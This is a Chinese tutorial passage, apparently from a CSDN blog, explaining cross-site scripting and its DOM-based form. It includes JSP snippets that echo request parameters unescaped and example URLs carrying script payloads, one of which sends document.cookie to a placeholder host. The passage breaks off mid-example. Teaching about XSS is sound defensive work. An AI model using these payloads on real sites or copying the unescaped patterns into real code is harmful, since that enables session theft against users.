XSS 攻击,即跨站脚本攻击(Cross Site Scripting),它是 web 程序中常见的漏洞。
原理
攻击者往 web 页面里插入恶意的 HTML 代码(Javascript、css、html 标签等),当用户浏览该页面时,嵌入其中的 HTML 代码会被执行,从而达到恶意攻击用户的目的。如盗取用户 cookie 执行一系列操作,破坏页面结构、重定向到其他网站等。
种类
1、DOM Based XSS:基于网页 DOM 结构的攻击
例如:
input 标签 value 属性赋值
//jsp
<input type="text" value="<%= getParameter("content") %>">
访问
http://xxx.xxx.xxx/search?content=<script>alert('XSS');</script> //弹出 XSS 字样
http://xxx.xxx.xxx/search?content=<script>window.open("xxx.aaa.xxx?param="+document.cookie)</script> //把当前页面的 cookie 发送到 xxxx.aaa.xxx 网站
利用 a 标签的 href 属性的赋值
//jsp
<a href="escape(<%= getParameter("newUrl") %>)">跳转...</a>
访问
http://xxx.xxx.xxx?newUrl=javascript:alert(
什么是 XSS 攻击,如何避免?
最新推荐文章于 2024-08-06 13:47:14 发布
XSS攻击是一种常见的Web程序漏洞,通过插入恶意HTML代码执行攻击。分为DOM Based XSS和Stored XSS两种类型,前者利用DOM结构,后者将恶意脚本存储在服务器。攻击者可盗取用户cookie或重定向。防范措施包括输入数据的转义、过滤,输出内容处理以及前端校验。
摘要由CSDN通过智能技术生成